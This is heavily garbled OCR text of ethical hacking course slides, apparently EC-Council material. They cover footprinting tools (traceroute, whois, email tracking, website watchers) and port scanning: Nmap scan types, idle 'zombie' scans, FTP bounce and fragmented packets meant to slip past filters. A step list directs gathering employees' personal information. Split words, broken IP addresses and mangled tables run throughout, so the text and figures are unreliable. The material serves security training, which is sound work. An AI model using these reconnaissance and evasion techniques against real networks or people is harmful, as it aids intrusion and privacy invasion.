213,42,12,130 

194,170,2,117 

195,229,31,66 

195,229,0,234 

166,63,210,62 

63,216,0,42 

206,24,238,166 

216,239,48,193 

216,109,88,218 

216,239,39,99 



Professional 



213.42.12.11 
Response Time: 21 6 ms 



194.170.2.117 
Response Time: 154 ms 




Name 



5AM 



N eoTrace shows the 
traceroute output 
visually- map view, 
node view, and IP 
view 



dxb-emix-rb.gel30,emix,ae 
dxb-emix-ra.solOO,emix.ae 
bcr2.thannesside,cw,net 
pos5- 1 , cr02 . ashO 1 , pccwbtn , net 
bhrl-pos-10-0,sl:erlingldc2.cw,nel: 

2 18-google-excidusdc, exodus, net 
www, google, com 



21B,23E.48.13: 



pos5-1 .cr02.ash01 .pccwbtn.net 
Response Time: 71 3 ms 



Ohrl-pos-IO-D 3terling1dc2 cw.net 
Response Time: 446 ms 



pos5-3.cr02.ash01 .pccwbtn.net 
Response Time: 585 ms 



^ - e>to d u s d c , eilDdiJS. n e 
mse Time 442 ms"--. 



www.google.com 
Response Time: 533 ms 
life''*'"" 



ns) I Max (ms) #S. 








0 


0 1 


0 


0 7o 




216 


216 


216 


216 1 


0 


0% 


AE-EMIRNET-990929 


135 


135 


135 


135 1 


0 


0 7o 


AE-EMIRNET-990929 


154 


154 


154 


154 1 


0 


0% 


EMIRNET-EMIRNET 


159 


159 


159 


159 1 


0 


0% 


AE-EMIRNET-971125 


139 


139 


139 


139 1 


0 


0 7o 


EMIRNET-EMIRNET 


442 


442 


442 


442 1 


0 


0% 


CW-NETC52 


713 


713 


713 


713 1 


0 


0 7o 


CAIS-CIDR7 


446 


446 


446 


446 1 


0 


0% 


CW-05BLK 


508 


508 


508 


508 1 


0 


0% 


GOOGLE 


442 


442 


442 


442 1 


0 


0 7o 


DC3-8 


533 


533 


533 


533 1 


0 


0% 


GOOGLE 
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Tool: Visual Route Trace 



© www.visualware.com/download/ 



Vis ua IRo ute 7.1cTrialVersion 






1- 1^1 x|| 


File Edit 


Options Tools Help 








Address 


http :/A/vww. vl sualware.com 




* IP Addresses ]l 98.64.1 53.97 


^ Advanced mode 



Report for www.visualware.com [198.64.1 53.97] 



Analysis: ^^/wwMsuMw.ar.e c.o is a HTTP sen/er (running Apache/1 .3.27 (Unix) 

modJk/1 .2.0). 




Hop %Loss IP Address 



0 
1 
2 
3 
4 
5 
6 
7 
8 
9 

1 0 
1 1 
1 2 
1 3 
1 4 



21 7.1 65.221 .1 53 
21 3.42.1 2.6 
21 3.42.1 2.1 95 
1 94.1 70.2.1 1 7 
1 95.229.31 .35 
64.86.1 38.1 1 7 
1 29.250.9.229 
1 29.250.2.21 7 
1 29.250.2.33 
1 29.250.5.99 
1 29.250.2.34 
1 29.250.2.74 
1 29.250.27.1 84 
1 61 .58.1 57.61 
198.64.153.97 



Node Name 



SAM 



auh-emiK-rb.ge6303.er 
if-0-0.core2.Newark.tel( 
p4- 2-0-0. rOO.nwrknjOl .i 
pi 6-0-1-1 .r20.nycmny0 
p64-0-0-0.r21 .nycmnyO 
pi 6-1-0-1 .r21 .asbnvaO 
p64-0-0-0.r20.asbnva0 
pi 6-3-0-0.r00.stngva01 
ge-4-1 .cOO.stngvaOl .u; 

www.visualware.com 



Location 



(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
Newark, NJ, USA 
Newark, NJ, USA 
New York, '^'"^ ' 
New York, 
Ashburn, > 
Ashburn, > 
Sterling, V 
Sterling, VA, USA 



Tzone ms 



■05:00 
■05:00 



1 25 
1 22 
1 24 
1 22 
420 
41 9 



Graph 




Network 



Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
Emirates Internet 
Emirates Telecommunicati 
Teleglobe Inc. TELEGLOBE 
Veno, Inc. VRIO-1 29-250 



1 1 shows the connection path \ 
and the places where bottlenecks occur 



-05:00 


429 




420 




430 



Veno, Inc. VRIO-1 29-250 
Verio, Inc. VRIO-1 61-058 
Verio, Inc. VRIO-1 98-063 



Roundtrip time to www.visualware.com, average = 430ms, min = 420ms, max= 436ms - Mar 1 8, 2003 2:36:39 PM 



h 
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Tool: SmartWhois 



File Edit Vie^v Settings Help 



Clear Open Save 
IP, hostj or domain: !j 



Save All Print 



-opy 



Paste 



Refresh 



microsoft, com 



microsoft, com 



microsoft.com 



207,46,134.222 



l^licrosoft Corporation 
1 microsoft way 
redmondj WA 98052 
US 



http:// www.softdepi a.com/ smartwhoi s_ downl oad 
491 html 

SmartWhois is a useful network information utility 
that al I ows you to f i nd out al I aval I abl e i nformati on 
about an I P address, host name, or domain, 
including country, state or province, city, name of 
the network provider, administrator, and technical 
support contact information. 



Microsoft Corp (EPMKOEAUSO) msnfisttSMICR 
(Microsoft Corp 
One Microsoft Way 
Redmond, WA 98052 
US 

425 882 8080 



Unlike standard Whois utilities, 
SmartWhois can find the information 
about a computer located in any part 
ift MicmsS msnhst^MicRosoF ^j^g world, intclUgently querying the 

right database and delivering all the 
related records within a few seconds. 



One Microsoft Way 
Redmond, WA 98052 
US 

425-882-8080 



DNSl , CP. MSFT.NET 207.46, 138.20 
DNS3,UK.MSFT.NET213.199.144,151 
DNSl ,SJ.MSFT, NET 65.54.248.222 



Done 
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Scenario (cont.) 




Adam makes a few searches and gets some 
# • internal contact information. Hecallsthe 

i i i receptionist and informs her that H R has asked 

him to get in touch with a specific IT division 
B personnel. It's lunch hour, and he says he'd rather 

mail the person concerned rather than disturb ^ 
/ \ hi m. H e checks out the mai 1 1 D on newsgroups and 

^^/^^^^ stumbles on an IP recording. Retraces the IP J| 
m^mmUt^ destination. 

© What preventive measures can you suggest to check the 
avai I abi I i ty of sensi ti ve i nf ormati on? 

© What are the i mpl i cati ons for the target company? Can 
he cause harm to targetcompany at this stage? 

© Whatdoyou thinl<hecan do with the information he 
has obtained? 
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Screenshot: Visual Route Mai I Tracl<er 



Hop 



%Loss 



IP Address 



Node Name 



Location 



Tzone 



ms 



Graph 



Network 



0 
1 
2 
3 
4 
5 
6 
7 
S 
9 

10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 
21 
22 
23 



20 
30 
30 



21 7.1 65.221.1 53 
213.42.12.6 
213.42.12.131 
1 94.1 70.2.11 7 
1 95.229.31.35 
1 95.229.31.34 
62.21 6.1 44.25 
62.21 6.1 40.9 
1 66.90.1 33.1 65 
209.244.1 4.201 
209.247.1 0.233 
64.1 59.0.218 
64.1 59.2.165 
209.244.3.246 
209.245.1 46.1 50 
203.208.1 82.21 
203.208.1 72.29 
202.1 60.250.1 54 
165.21.12.78 
1 65.21.48.102 
1 37.1 32.1 9.1 00 
1 37.1 32.1 9.1 00 
1 37.1 32.1 9.1 00 
1 37.1 32.1 9.1 00 



SAM 



auh-emiM-rb.ge6303.er 
auh-emiM-ra.ge6303.er 

ge-1-0-0.0.core1.sfr1 .fl; 
gige4-1-1 1 6.ip:olo2.Sc 
gigabitethernet4-2.:ore 
so-4-0-0.mp2.SanFran 
so- 2-0-0. mp2.SanJose 
gigabitethernet5-2.:ore 
GigabitEthernetS-O.edg 
Singtel-Level3-o:3.ix.si 

p6-3.sngtp-:r2.ix.singt6 

FE-4-O-O.lavender.sing 

Olympus. bic.nus.edu.S! 
Olympus. bic.nus.edu.S! 
Olympus. bic.nus.edu.S! 
Olympus. bic.nus.edu. SI 



4514 



(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Kingdom) 
(United Kingdom) 
San Francisco, CA, US; 
San Francisco, CA, USj 
San Francisco, CA, USj 
San Jose, CA, USA 
San Jose, CA, USA 
Palo Alto, CA, USA 

Singapore 
Singapore 
Singapore 
(Singapore) 
Singapore 
(Singapore) 
(Singapore) 
(Singapore) 
(Singapore) 







2537 






2513 






2467 






2429 






2421 


* 




2766 


* 




2894 


-08 


00 


2655 


-08 


00 


2695 


-08 


00 


3008 


-08 


00 


3073 


-08 


00 


3009 


-08 


00 


2996 




Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
FIJ^G Telecom Limited 
FU^G Telecom Limited 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
Level 3 Communications, Ir 



It shows the number of 
hops made and the 
respective I P addresses, 
the node name, location, 
time zone, network, etc. 



+ 08:0( 3159 



National University of Sinqa 



24 



137.132.19, 



0 



Olympus. bic.nus.edu.S! (Singapore) 



+08:0( 3115 



National University of Singa 



Roundtrip time to olympus.bic.nus.edu.sg, average = 31 1 5ms, min = 1 1 33ms, max= 4296ms - Mar 1 3, 2003 2:23:03 PM 
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Tool: eMailTrackerPro 



eMailTrackerPro by Visualware 



nlxl 



File Edit View Help 

"Long Distance - 4.9 cents per min - NO FEES!" 

e-mail Analysis: 




From: IP address 203.1 27.S9.13S. 

Location: Singapore - For a detailed geographic trace, run.VJsualRoute. 

Mailer: The sender used 'QUALCOMM Windows Eudora Pro Version 4.1 ' to send the e-mail. 

Received Headers: Attempted misdirection: 'tes1a623.0neMail.com.sg' is not 

203.1 27.S9.1 29 in RJ. (El 2). Attempted misdirection: 'drb.com' is not 203.1 27. S9.1 3S in R2 
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eM ai ITrackerPro is the emai I 
Singapore h analysistool that mables anal ysis 
of an ennail and its headers 

autonnati call y and provides 

graphical results 
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Tool: Read Notify (readnotify.com) 



Notify 



Member Sign-in 



tracR" »^ 

your !> 

^ejnaiL 



Welcome to ReadNoti1y.com ! 

ReadNotify lets you know when email 
yciuVe sent gets read 

Length of Reading 

Find out how long they read your email fo 



email 



Start here! New: Get the optional Plut 



Mail Tracking is a tracking 
service that allows the user 
to track when 
his mail was read, for how 
long and how many times, 
and 

the place from where the mail 
has been posted. 
It also records forwards and 




passing of 

about Re@dNotify ^ bus!, gensitlve Information (MS 



Office format). 
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Website Watcher 



© Website watchers can be used to get updates on 
the website. 

© Can be used for competitive advantages. 
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■ WebSite-Watcher 



File Folder Bookmarks Search Import Backup Options View Help 



Folder 

^ Bookmarks 

^ All Bookmarks [5] 
♦ Changed Book... 
14 HotSites 
© AutoWatch 
X Disabled Bookm... 
Errors 
Trash 

General [3] 
Magazines 
News 
private [1] 
^ Programming 
^ Components 
5 FAQ 
Ci Tools 
Software [1] 
(5 Tools 



I Total I 



Bootmarte: 80 [5] 



0 
80 

5 

0 
10 
12 
16 

0 

18 

6 
0 
8 

13 

3 
0 
3 
8 
7 
18 



^ H H Name 

WebSite-Watchei [PAD] 

FTP-Uploader 
NetCaptor 

Opera ■ the fastest browser ... 
PAD Gen 
The Bat 

WebSite-Watcher BETA 
WinRAR 



URL 

http://aignes.net/pad/.. 

http://www.ftp-uploader.de... 

http://www.netcaptor.com/ 

http://www.opera.com/ 

http: //www. asp-shareware... 

http://www.ritlabs.com/the... 

http://aigres.net/beta.htm 

http://www.rarsoft.com/wel... 

I 



last check 
28-NDV-2001 - ... 

28-NOV-2001 - 07:53 
28-NOV-2001 - 03:01 
28-NOV-2001 - 03:01 
28-NOV-2001 - 03:01 
28-NOV-2001 - 03:03 
28-NOV-2001 -12:33 
28-NOV-2001 - 03:02 



Status 

□ K 

□ K 

□ K 

□ K 
OK 
OK 
OK 
OK 



|file:///E:/proi/w ^v, * .* » Q Q ( ffl B 0 ^ ' 



S9tting "rjse (default path" was enableid 

[-] bugfix: button "Test filter" \r\ (dialog "ignore 

userrdefined strings" idiidn't work properlyj if there were 

more than one regular expressions entered 

[-] minor bugs fixed 



[+J Bookmark properties / new check option: max. one 
update per week 

[+J Bookmark properties / new AutoWatcli option: max. 
one update per week 

[■¥} New report fields: <!--wsw_note--> and <!-- 
ws w_no te_ forma t--> 

[-] relative links were not converted correctly to 



Fertiig 
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Website Watcher 




^gWe bSite - Watc her 



File Folder BooloTiarlis Search Import Backup OELtions View Help 



Folder 


Total 


Bookmarks 


□ 


i All Bookmarks [5] 


80 


i - ♦ Changed Book... 


5 


I - H HotSites 


□ 


I -© AutdWatch 


10 


!■■■■ ^ Disabled Bookm... 


12 


i ■■ I-^ Errors 


1G 


i - S Trash 


□ 


General [3] 


18 


il" ^ Magazines 


6 


i - News 


□ 


!■■■■ private [1 ] 


6 


i - Programming 


13 


i " Components 


3 


1 FAQ 


□ 


Tools 


3 


i -t3t Software [1] 8 


Tools 


7 


ra^ wswatch 


16 



❖ ♦ * ♦ H 



^ e S Name 

* * - WebSite-Watcher (PADj 

* * ■> FTP-Uploader 

* * ■> NetCaptor 

* 1 Opera - the fastest browser ... 

* * ■> PADQen 

* - El The Bat 

* * - WebSite-Watcher BETA 

* * ' WinRAR 

< I INI 



I URL 

http: / /aignes. net/pad/. . 

http: //www. ftp-uploader. de. . 
http: //www. netcaptor. com/ 
http: //www. opera, com/ 
: http: //www. asp-shareware... 
http://www.riHabs.com/the... 
http://aignes.net/beta.htm 
http: //www. rarsoft com/ wel. . 



last check I Status 

28-NOV-2001 - ... OK 

28-NOV-2001 - 07:59 OK 

28-NOV-2001 - 08:01 OK 

28-NOV-2001 - 08:01 OK 

28-NOV-2001 - 08:01 OK 

28-NOV-2001 - 08:03 OK 

28-NOV-2001 - 12:33 OK 

28-NOV-2001 - 08:02 OK 



iSii.l 



@ @ ^ a / 



file:///E:/proj/w v 



« □ □ II Q 



setting "use default path" was enabled 

[-] bugfix: button "Test filter" in dialog "ignore 

userdefined strings" didn't work properly, if there were 

more than one regular expressions entered 

[-] minor bugs fixed 



[+J Bookmark properties / new check, option: max. one 
update per week 

[+J Bookmark properties / new AutoWatch option: max. 
one update per week 

[+] New report fields: <!--wsw_note--> and <!-- 
ws w_note_ forma t--> 

[-] relative links were not converted correctly to 



■ 



Bookmarks: 80 [5] 
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Website Watcher 





Name: 
URL: 



ebSite-Watcher BETA 



http: / / aignes. net/beta/beta. htm 



Alternative Check-URL (if empty, URL will be checked) 



r 



Checking-method" 

(+> bv content 
O by file-date 
O by file-size 

□ Don't check 



^Options when checking websites for changes 

0 Ignore all links and images/banners 

0 Ignore all HTML-Tags 

1 I Ignore userdefined strings 



Strings 



I I Watch only userdefined strings | Strings ] 

I I Ignore all numbers 

I I Ignore all typical date-strings 



Test filter 



Compare versions 



□ K 



Cancel 



Help 
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Website Watcher 





Search | Options || Search Results] 



Search for: 



website-w 



r^Folder 

O All Bookmarks 
®| Selected folder 

0 Include Subf ciders 



Where 



0 Bookmarks 

0 New Versions (file) 

□ Old Versions (file) 



□ K 



Help 



Close 



mm 



p 



/demo wsw/OOOO/wswat 200111281047268203.htm chq.ht 



Attnang-h'ucnneimj ^auu 
Austria 



Release Date; 11/09/2001 
Release Status: Major 
Update 



File Size: S5<5kB (O.seMB) 



Type: Shareware 
Cost: 29.95 



Keywords: Bookmark Cfnecker^ Bookmark Organizer^ Update Cfnecker^ Link Cfnecker^ 
Favorites Checker^ WebSite Watcher^ WebSite-Watcher^ WebSite Download^ Offline 
Readerj Offline Browser 



Description: WebSite-Watcfner Q^^g^a your favorite websites for updates and 
changes with a minimum of time and online-costs. When changes are detected 
WebSite-Watcher saves the last two versions of websites to your harddisk and 

Ininlnlinlnl" ^11 (-"In^mnoc im l-izi^^l" ^iimmr-ih-l-c T^/FV^I^/r" Imor^ P.h-r-i\A/coh-— Th-i1"onh-^1"ir-ih-i T ky-i m n ^ m H 
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steps to Perform Foot Printing 



© Find connpanies' external and internal URLs. 

© Perform whois lookup for personal details. 

© Extract DNS information. 

© Mirror the entire website and look up names. 

© Extract archives of the website. 

© Google search for company's news and press releases. 

© Use people search for personal information of employees. 

© Find the physi cal I ocati on of the web server usi ng the tool 
"NeoTracer." 

© Analyze company's infrastructuredetailsfrom job postings. 

© Track the emai I using "readnotify.com." 
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© I nformation gathering phase can be categorized 
broadly into seven phases. 

© Footpri nti ng renders a unique security profi le of a 
target systenn. 

© Whois, ARI N can reveal public information of a 
domain that can be leveraged further. 

© Traceroute and mai I tracki ng can be used to target 
specific I P and later for I P spoofing. 

© Nslookup can reveal specific users and zone transfers 
can compromise DNS security. 
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Ethical Hacking 



Modulelll 
Scanning 




I 



J ack and Dave were col leagues. 1 1 was J ack's idea to come up with a e- 
business company. However, conflicts in ideas saw them split apart. 

Dave heads a Venture- Capital funded e-business start-up company now. 
J ack felt cheated and wanted to strike back at Dave's company. 

H e knew that due to i ntense pressure to get i nto market qui ckly, these start- 
ups often build their infrastructures too fast to give security the thought it 
deserves. 

• Do you think that J ack is correct in his assumption? 

• What information do J ack need to launch an attack on Dave's company? 

• Can J ack map the enti re network of the company without bei ng traced back? 
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Module Objectives 



© Definition of scanning 
© Objectives of scanning 
© Types of Scanning 
© CEH Scanning nnetliodology 
© Scanning tecliniques 
© Scanning tools 
© OS fingerprinting 
© Counter measures 

BC-Council 
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Module Flow 






Counter measures 
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Types of scanning 



Scanni ng Objectives 




U se of proxy servers i n 
attacl< 
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Scanning - Definition 



© One of the three connponents of i ntel I i gence 
^ gathering for an attacker. 

© The attacker fi nds i nformation about the 
H • specific IP addresses 
• operating systems 
the system architecture, 
pi • the services runni ng on each computer. 





The vari ous types of scanni ng are as fol I ows: 
©Port scanning 
©Network Scanning 
©Vul nerabi I i ty Scanni ng 
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Types of Scanning 



©Port scanning 

• A seri es of messages sent by someone attempti ng to 
breal< i nto a computer to learn about the computer's 
networl< services. 

• Each associated with a "well-l<nown" port number. 

©Network scanning 

•A procedure for identifying active hosts on a networl<. 

•E i ther for the purpose of attacl<i ng them or for 
networl< security assessment. 



©Vul nerabi I ity scanni ng 

•The automated process of proactively identifying 
vul nerabi I ities of computi ng systems present i n a 
network 

BC-Council 
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Objectives of Scanni ng 



© To detect the live systems running on the 
networl< 

© To discover which all ports are 
active/ running 

© To di scover the operati ng system 
running on the target system 
(fingerprinting) 

© To discover the services 

runni ng/ 1 i steni ng on the target system 
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© To discover the I P address of the target 
system. 
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CEH Scanning methodology 



I 




Banner grabbing 
/OS Fingerprinting 





ATTACK!! 



Draw networl< diagrams of 
Vulnerable liosts 



Prepare proxies 
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Checki ng for I i ve systems 




BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Checking for live systems- ICMP Scanning 



[© Inthistypeof scanning, it is found out what all host are up in 
a network by pi ngi ng them al I . 

[© I CM P scanning can be run parallel so that it can run fast. 

© 1 1 can also be hel pful to tweek the pi ng ti meout val ue with the 
lip-t option. 
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Angry I P 



© An I P scanner for Windows. 

© Can scan I P's in any range. 

© 1 1 si mply pi ngs each I P address to 
checl< if it is alive. 

© Provides NETBIOS information 
such as 

• Computer name 

• Workgroup name 

• MAC address 
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HPING2 



I 



© H PING is a command-line 
oriented TCP/ 1 P packet 
assembler/ analyzer. 

© It not only sends I CMP echo 
requests but also supports 

• TCP, 

• UDP, 

• I CMP and 

• Raw-! P protocols 

© has a Traceroute mode, 

© The ability to send files 
between a covered channel. 
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Features 

© Firewall testing 

© Advanced port scanning 

© Network testing, using 
different protocols, TOS, 
fragmentation 

© Advanced Traceroute, 
under all the supported 
protocols 

© Remote OS fingerprinting 

© Remote uptime guessing 

© TCP/ 1 P stacks auditi ng 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



J 



Ping Sweep 



© A ping sweep (also known as an I CM P sweep) is a 
basic networ k scan ningteclini que used to 
determi ne which of a range of I P addresses map to 
live hosts (computers). 

© A ping sweep consists of I CM P ECH O requests sent 
to multiple hosts. 

© If a given address is live, it will return an I CMP 
ECHO reply 
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F i rewal k 



0 Fi rewal k is a network-auditing tool. 

© 1 1 attennpts deternni nes what type of transport protocol s a gi ven gateway 
will let through 

© The Fi rewal k scans work by sending out TCP or UDP packets with an I P 
TTL which is one greater then the targeted gateway. 

Destination Host 



g, fl, 



S 




PACKET FILTER 



a 



Hop n 



Hop n-Hn (nn>l) 



Fi rewal king Host 
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Checki ng for open ports 




Nmap 



© N map is a free open source uti I ity 
for network exploration. 

© It is designed to rapidly scan large 
networks. 

Featur^ 

© N map i s used to carry out port 
scanning, OS detection, version 
detection, ping sweep and many 
other techniques ^^^^^^^ 



1 1 scan large number of machi nes at 
one go. 

© 1 1 is supported by many operati ng 
! systems 

© 1 1 can carry out al I types of port 
^ scanning techniques 
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W. 



"TlWap Front End vI.'W 



File View 



Help 



Tai'get(s): www.insecure.ori 



Scar 



Exit 



Scan Discover Timing Flies Options 



Scan Type 


-Scannea Ports 1 


SVN Steaitli Scan ; 


Most important [fast] * 






Reiay Host: | 


1 Range: 







-Scan Extensions 



□ RFC Scan □idertdinfo 0 OS Detection 0 Version FroPe 



Starting nmap 3.49 ( http://uuu.insecure.org/nnap/ ) at 2003-12-19 14;28 PST 

Interesting ports on www.insecure.org (205.217.153.53); 

(Tine 1212 ports scanned but not sfiown l:eloki are in state; filtered) 

PORT STATE SERVICE VERSION 

22/tcp open ssh OpenSSH 3.1pl (protocol 1.99) 
25/tcp open sntp qmail sntpd 
53/tcp open domain ISC Bind 9.2,1 

80/tcp open http flpaciie httpd 2.0.39 ((Unix) r(iod_perl/1.99_07-dew Ferl/v5.6.1) 

113/tcp closed auth 

Device type; general purpose 

Running: LinuK 2.4.Mi2.5.K 

OS details: LinuK Kernel 2.4.0 - 2.5.20 

Uptime 212.119 days (since Ned Hay 21 12;38;26 2003) 

Nmap run completed — 1 IF address (1 host up) scanned in 33.792 seconds 



Command: nmap -sS -sV -0 -F -Ri -T4 www.insecijre.org 
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Nmap: Scan Methods 



© Some of the scan methods used by 
Nmap: 

• X mas tree: The attacker checks for TCP 
services By sending "Xnnas-tree" 
packets. 

• SYN stealth: It is referred to as "half- 
open" scanning, as a full TCP connection 
is not opened 

• Null Scan: I t's an advanced scan that 
nnay be able to pass through firewalls 
unnnolested 

• Windows scan: It issinnilar totheACK 
scan and can also detect open ports 

• ACK Scan: used to nnap out fi rewal I 
rulesets. 
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Scan j Discover ] Options | Timing | Files | Service | 
Mode 

(• Connect C Null Scan C RCPScan 

r SYN Stealth XmasTree f List Scan 

r FIN Stealth f IP Protocol Scan 

r Ping Sweep ^' ACK Scan 

r UDP Port Scan C Window Scan 
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SYN Stealth / Half Open Scan 



© 1 1 is often referred to as half open scan because it 
doesn't open a full TCP connection 

© F i rst a SYN packet i s sent to a port of the machi ne, 
suggesting a request for connection, and the response is 
awaited 

© I f the port sends back a SYN/ ACK packet, then it is 
i nf erred that a servi ce at the parti cul ar port i s I i steni ng. 
If an RST is received, then the port is not active/ 
listening. As soon as the SYN/ ACK packet is received an 
RST packet is sent, i nstead of an ACK, to tear down the 
connection 

© The key advantage of this scan is that fewer sites log this 
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TCP Communication Flags 



© Standard TCP communications are controlled by flags in the TCP packet header. 
© The flags are as follows: 

• Synchronize- also called "SYN" 

- U sed to i n i ti ate a con necti on between hosts. 

• Acknowledgement - also called "ACK" 

- Used i n estabi ishi ng a connection between hosts 

• Push-"PSH" 

- I nstructs recei vi ng system to send al I buffered data i mmedi atel y 

• Urgent- "URG" 

- States that the data contai ned i n the packet shoul d be processed 
immediately 

• Finish - also called "Fl N" 

- Tells remote system that there will be no more transmissions 

• Reset - also called "RST" 

- Also used to reset a connection. 
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Three Way H andshake 



Computer A Computer B 

192.168.1.2:2342 syn >192. 168 .1.3:80 

192.168.1.2:2342 < syiVack 192.168.1.3:80 

192.168.1.2:2342 ack >192. 168 .1.3:80 

Connection Established 



© TheComputer A ( 192.168.12) initiates a connection to the server ( !192.168.13 ) viaa pacl<et witli only 
tine SYN flag set. 

© The server replies with a packet with both the SYN and the ACK flag set. 

© For the final step, the client responds back the server with a single ACK packet. 

© If these three steps are completed without complication, then a TCP connection has been established 
between the client and server. 
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Computer A 



Computer B 



192.168.1.2:2342 



-syn 

■syn/ack- 



>192. 168. 1.3:80 



192.168.1.2:2342 <- 



192.168.1.3:80 



192.168.1.2:2342— 



RST- 



->192. 168. 1.3:80 



© Client sends a single SYN packet to the server on the appropriate port. 

© I f the port is open then the server responds with a SYN/ ACK packet. 

© If the server responds with an RST packet, then the remote port is in state "closed" 

© The client sends RST packet to close the initiation before a connection can ever be established. 

© This scan also known as "half-open" scan. 
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Xmas Scan 



Computer A Computer B 

Xmas scan directed at open port: 

192.5.5.92:4031 EEN/URG/PSH >192. 5. 5.110:23 

192.5.5.92:4031 < NO RESPONSE 192.5.5.110:23 



Xmas scan directed at closed port: 

192.5.5.92:4031 EEN/URG/PSH >192. 5. 5.110:23 

192.5.5.92:4031< RST/ACK 192.5.5.110:23 

© N ote: X M AS scan only works OS system's TCP/ 1 P i mpl ementati on i s devel oped 
accordingtoRFC793 

© Xmas Scan will not work against any current version of M icrosoft Windows. 

© X mas scans di rected at any M i crosoft system wi 1 1 show al I ports on the host as bei ng 
closed. 
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FIN Scan 



Computer A 



Computer B 



BIN scan directed at open port: 



192.5.5.92:4031 FIN >192 .5.5.110:23 

192.5.5.92:4031 < NO RESPONSE 192.5.5.110:23 



FIN scan directed at closed port : 

192.5.5.92:4031 FIN 192 .5.5.110:23 

192 . 5 . 5 . 92 : 4 03K RST/ACK 192 .5.5.110:23 

© N ote: F I N scan only works OS system's TCP/ 1 P i mpl ementati on i s devel oped 
accord i ng to RFC 793 

© FIN Scan wi 1 1 not work agai nst any current versi on of M i crosoft Wi ndows. 

© FIN scans di rected at any M i crosoft system wi 1 1 show a! I ports on the host as bei ng 
closed. 
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NULL Scan 



Computer A Computer B 

NULL scan ciirected at open port: 

192.5.5.92:4031 NO FLAGS SET >1 92 . 5 . 5 . 1 1 0 : 2 3 

192.5.5.92:4031 < NO RESPONSE 192.5.5.110:23 



NULL scan directed at closed port : 

192.5.5.92:4031 NO FLAGS SET 192.5.5.110:23 

192 . 5 . 5 . 92 : 4 03K RST/ACK 192 .5.5.110:23 

© Note: NULL scan only works OS system's TCP/ 1 P i mplementation is developed 
accord! ng to RFC 793 

© NULL Scan wi 1 1 not work agai nst any current vers! on of M 1 crosoft Wi ndows. 

© NULL scans di rected at any M 1 crosoft system wi 1 1 show al I ports on the host as 
being closed. 

Copyri ght © by BC-Cbunc i I 
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IDLE Scan 



© Almost four years ago, security researcher 
Antirez posted an innovative new TCP port 
scanning technique. 

© I diescan, as it has become l<nown, allows for 
completely blind port scanning. 

© Attacl<ers can actual ly scan a target without 
sendi ng a si ngle packet to the target from thei r 
own I P address. 
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IDLE Scan: Basics 



© M ost network servers listen on TCP ports, such as web servers on port 80 
and nnail servers on port 25. 

© A port is considered "open" if an application is listening on the port, 
otherwise it is closed. 

© One way to deternnine whether a port is open is to send a "SYN" (session 
establishment) packet to the port. 

© The target nnachinewill send backa "SYN|ACK" (session request 

acknowledgment) packet if the port is open, and a "RST" (Reset) packet if 
the port is closed. 

© A machine which receives an unsolicited SYN|ACK packet will respond 
with a RST. An unsolicited RST will be ignored. 

© Every I P packet on the I nternet has a "fragment identification" number. 

© M any operati ng systems si mply i ncrement this number for every packet 
they send. 

© So probing for this number can tell an attacker how many packets have 
been sent si nee the I ast probe. ^ 
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IDLE Scan: Step 1 



I 



© Choose a "zombie" and problefor its current 
I PI D number 



A ttackei 



IPID Probe 
SYN I ACK Packet ' 

Response; IPID=31337 
' RST Packet 



Z ombie 
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IDLE Scan: Step 2 



© Send forged packet "from' 



Probe to OPEN port 0 0 



OR 



A. 


Session Request "from" Z 




SYN to port SO; Src IP: 






^^^^^^ 


Taiget 


Z 


Bogus Session; 1P1D=3133S 






RST 





z 
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Zombie to target. 

Probe to CLOSCD port 4 2 



Session Request "from" Z ( 
SYN to port 42; Src IP: 




V J 
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IDLE Scan: Step 3 



© ProbeZombiel PI D again 



A 



IPID Probe 



SYNIACK 

Response; IPID=31339 
RST 




IPID increa-secf by 2 =incc step ttl, 
port 0 0 on t&r^et nust be open I 



3 0 



J 



IP ID 
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IPID Probe 



SYNIACK 

Response; IPID=3133g 
RST 




y mcreued by port 4£ 
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I CMP echo scanning/ List Scan 



© I CMP echo scanning 

• This isn't really port scanning, si nee I CMP doesn't have 
a port abstraction. 

• But it is sometimes useful to determine what hosts in a 
network are up by pi ngi ng them al I . 

• nmap-Pcert.org/24 152.148.0.0/16 



© List Scan 

• This type of scan simply generates and prints a list of 
I Ps/ Names without actually pinging or port scanning 
them. 

• A DNS name resolution will also be carried out. 
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TCP Connect/ Full 



© This is the most reliable form 
of TCP scanning. The 
connectO system call 
provi ded by the operati ng 
system i s used to open a 
connection to every open port 
on the machine. 

© I f the port is open then the 
connectO will succeed and if 
it is the port is closed then it 
is unreachable. 

BC-Council 



SYN 



ACK 



SYN 

+ - 
ACK 
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FTP Bounce Scan 



© A type of port scanning which nnal<es use of the Bounce 
attacl< vul nerabi I ity i n FTP servers. 

© Thisvulnerabilityallows a person to request that the FTP 
server open a connection to a third party on a particular 
port. Thus the attacl<er can use the FTP server to do the port 
scan and then send bacl< the results. 

© Bounce attack: This is a attack that is similar to I P spoofing. 
The anonymity of the attacker can be mai ntai ned 

© The scan is hard to trace, permits access to local networks 
and evades firewalls. 
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FTP Bounce Attack 




Bounce FTP Server 
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SYN/ Fl N scanning using I P fragments 



© It is not a new scanning method but a 
modification of earlier metliods. 

© The TCP header is split up into several packets 
so that the packet f i Iters are not able to detect 
what the packets i ntend to do. 
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UDP Scanning 



© UDP RAW I CMP Port Unreachable Scanning 

• This scanning method uses a UDP protocol instead 
of a TCP protocol . 

• Though this protocol is simpler but scanning it is 
more difficult. 

© UDP RECVFROMO Scanning 

• While non root users cant read port unreachable 
errors directly, LI NUX is cool enough to inform the 
user i ndi rectly when they have been received. 

• Thi s i s the techni que used for determi ni ng the open 
ports by non root users. 
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Reverse I dent Scanni ng 



© The I dent protocol allows for the disclosure of the 
user name of the owner of any process connected via 
TCP, even if that process didn't initiate the connection. 

© So connection can be established to the http port and 
then use i dent to find out whether the server is running 
as a root. This can be done only with a full TCP 
connection to the target port. 
